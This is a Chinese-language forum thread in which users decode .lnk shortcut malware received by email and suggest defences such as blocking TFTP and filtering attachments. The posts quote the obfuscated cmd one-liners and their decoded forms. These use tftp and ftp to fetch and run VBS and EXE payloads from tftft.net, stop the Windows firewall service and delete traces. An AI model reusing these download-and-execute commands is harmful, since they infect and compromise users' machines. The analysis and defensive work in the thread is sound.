登入區塊
帳號:

密碼:


索取密碼

註冊會員
主選單區塊
全站搜尋
自訂搜尋
搜尋本站
微軟技術文件查詢

輸入微軟KB編號查詢:

KB

誰在線上區塊
線上目前共14
(9人在瀏覽討論區)

會員: 0
訪客: 14

尚有…
發表數排行區塊
1
threesecond
3167
2 Sdany 269
3
Lyan
250
4 ch999 233
5
BM
220
6
arfur
189
7
TSC1717
176
8
larry
129
9
zhenyuan
125
10
magical
118
論壇使用規範
  1. 禁止回覆置頂文章。
  2. 禁止注音文。
  3. 禁止如題文。
  4. 禁止 Cross Post。
  5. 禁止什麼都不做就叫我從頭教到尾的文。
  6. 更詳細的刪文規定請見[公告] 刪文規定
  7. 論壇貼圖請貼到電子相簿討論區貼圖專用區

違者初犯刪文,再犯刪帳號。不滿此規則者請到 SYSOP 申訴。

授權規定
1、本論壇所有文章之文責皆由發表者自負,請勿發表或連結侵害他人權利或違法之著作。
2、發表於本論壇之所有文章、程式(或程式碼),站長皆有權予以刪除、改寫。
3、由站長(threesecond)所發表與改寫之文章、程式(或程式碼)及相類似之著作,其權利皆屬站長(threesecond)所有,
除經站長(threesecond)之同意外,不得以任何方式予以引用或連結至他處,
任何未經同意之引用、超連結等行為皆屬侵犯站長(threesecond)權利之行為。將依法予以論處。
4、若使用者開始瀏覽本論壇任一網頁時,即視為知悉、理解並同意上開條款。

Security : lnk 類型病毒動作模式研究與請益

發表者 討論內容
larry
三段會員
  • 註冊日: 2007-04-05
  • 來自:
  • 發表數: 129
lnk 類型病毒動作模式研究與請益
之前一直沒時間細看目前的 lnk 病毒是在做啥,今天又收到一封「best wishes」的夾檔,就發想研究一下吧...

lnk 的內容如下:
引文:
rem %CoMsPEC% /C ecHo %M%%X%%M%P%A%%m%%x%%m%%X%%m%.NE%M%%a%gE%m%%A%%M%%a%F.Vbs>O.BAT&echo S%M%AR%M%%a%f.vBS>>o.BaT&SEt M=t&sEt x=f&SEt a= &O.bAT

為了容易辨識,我全改小寫:
引文:
rem %comspec% /c echo %m%%x%%m%p%a%%m%%x%%m%%x%%m%.ne%m%%a%ge%m%%a%%m%%a%f.vbs>o.bat&echo s%m%ar%m%%a%f.vbs>>o.bat&set m=t&set x=f&set a= &o.bat

才疏學淺的小弟只能解譯出這樣:
引文:
rem cmd /c echo %m% %x% %m% p %a% %m% %x% %m% %x% %m% .ne %m% %a% ge %m% %a% %m% %a% f.vbs>o.bat&echo s %m% ar %m% %a% f.vbs>>0.bat&set m=t&set x=f&set a= &o.bat

它是在製作可執行的VBS轉成bat指令吧?然後叫 cmd 去執行,但是實在看不出它如何做...這點,就請先進指導了...
(我沒勇氣找別的電腦執行...然後看結果...)
(指令行最前之 rem 是自己加上)


----------------
--- 回答提供參考,發問虛心求教 ---

s793016
二段會員
  • 註冊日: 2006-09-22
  • 來自:
  • 發表數: 63
Re: lnk 類型病毒動作模式研究與請益
您解譯得差不多了丫,您把 set = 的東西再分行,然後把環境變數代換進去原字串,就看得出來他幹了什麼壞事了

解出來就是這樣:
%CoMsPEC% /C ecHo tftP tftft.NEt gEt t F.Vbs>O.BAT
echo StARt f.vBS>>o.BaT
o.bat

所以 o.bat 的內容就會是這樣:
tftP tftft.NEt gEt t F.Vbs
StARt f.vBS


抓下來的 F.VBs 內容:
sub k
for i=1 to UBound(s)
r=r&chr(s(i)-823)
next
Set kk = CreateObject("Wscript.Shell") 
kk.run r,0
end sub
s=array(836,922 ... 中略 ... 942,870)
k

array 內的東西應該就是機器碼了


----------------

Luckey
初心者
  • 註冊日: 2009-03-21
  • 來自:
  • 發表數: 19
Re: lnk 類型病毒動作模式研究與請益
之前有看到某網站解說,這類型病毒是利用系統內建的 TFTP程式
Trivial File Transfer Protocol(簡單文件傳輸協議)作背景自動傳輸,因為是內建程式,所以防毒軟體不會有反應

而tftp.exe又是系統保護檔案,無法直接刪除

最簡單的應對方式是把TFTP使用的 Port 69 關閉,就可以阻止
(或者是利用權限設定來禁用tftp.exe)

因為不是這方面專長,不敢實際測試....



larry
三段會員
  • 註冊日: 2007-04-05
  • 來自:
  • 發表數: 129
Re: lnk 類型病毒動作模式研究與請益
引文:

s793016 寫道:
您解譯得差不多了丫,您把 set = 的東西再分行,然後把環境變數代換進去原字串,就看得出來他幹了什麼壞事了
~恕省略~

是啊~~做的真是滿隱密的,像我這種二流系統研究的人,就在一時之間看不出所以然....

環境變數代入字串..嗯~真是用大小寫及空白或是錯亂位置來擾亂視聽。不過您還真的執行了他的動作,他會抓檔下來後再搞怪,這就是目的了。
又根據 Luckey 所提,找到相關少用的「指令用執行檔」,把它給封了,也是不錯的抵制方法!

我是從不當「直接」好奇寶寶(enter&Double Click),從前拆解過自動解壓縮用圖檔做幌子的病毒檔,就覺得很有趣,現在做病毒的已經更上一層了, enduser 更要注意小心了~


----------------
--- 回答提供參考,發問虛心求教 ---

threesecond
網站管理員
  • 註冊日: 2003-11-05
  • 來自:
  • 發表數: 3167
Re: lnk 類型病毒動作模式研究與請益
簡單的作法:
如果你有自己管轄權的防火牆或 Mail Sserver,
Mail Server 可以直接禁止夾帶 .lnk 附檔,
防火牆可以用 URL Filter 去過濾 .lnk,
另外在防火牆上過濾 ftp// 協定下載 .vbs,
這樣就能防止大部分此類病毒了。

正常來說沒有人會把「捷徑」放在網路上下載,
所以擋掉這類型的檔案,幾乎不太會造成誤判。


----------------
不要叫我大大,我今天大過了。

金牛347
初心者
  • 註冊日: 2009-09-24
  • 來自:
  • 發表數: 12
Re: lnk 類型病毒動作模式研究與請益
引文:

s793016 寫道:

抓下來的 F.VBs 內容:
sub k
for i=1 to UBound(s)
r=r&chr(s(i)-823)
next
Set kk = CreateObject("Wscript.Shell") 
kk.run r,0
end sub
s=array(836,922 ... 中略 ... 942,870)
k

array 內的東西應該就是機器碼了

=========================================
不是機器碼,是繞碼;

其內容如下
引文:

cmd /c net stop sharedaccess&echo o tftft.net>n.txt&echo 11>>n.txt&echo recv d d.exe>>n.txt&echo bye>>n.txt&ftp -s:n.txt&d.exe&attrib ?.vbs -r&del ? ?.exe ?.vbs ?.bat ??.bat&start http://buy.yahoo.com.tw
McEvoy
初心者
  • 註冊日: 2010-06-12
  • 來自:
  • 發表數: 1
Re: lnk 類型病毒動作模式研究與請益
對不起,借個標題請教一下
小弟的女友收到了不明的lnk郵件,還不小心點擊執行了
因為我實在看不懂lnk裡面的內容
可否請教一下這段連結到底做了什麼?
執行之後,又要怎樣補救避免造成傷害?
謝謝

引文:
%cOmspEc% /c SET Y= GET &eCho tftP tf%W%ET%y%T C%s%BS>rt.BAt&ECHO StaRt c%s%Bs>>rt.BaT&sEt S=.v&Set W=tFT.n&RT.Bat
Sdany
九段會員
  • 註冊日: 2006-09-07
  • 來自:
  • 發表數: 269
Re: lnk 類型病毒動作模式研究與請益
把那些 %xxx% 用 set xxx 的變數套進去後
可以得知
使用 tftp (系統內鍵) 下載某網站上的 c.vbs
再執行 c.vbs
該 c.vbs 是什麼內容就不知道了 = =


----------------
1. KL Key Check
2. 看網路電視、聽廣播
3. My Blog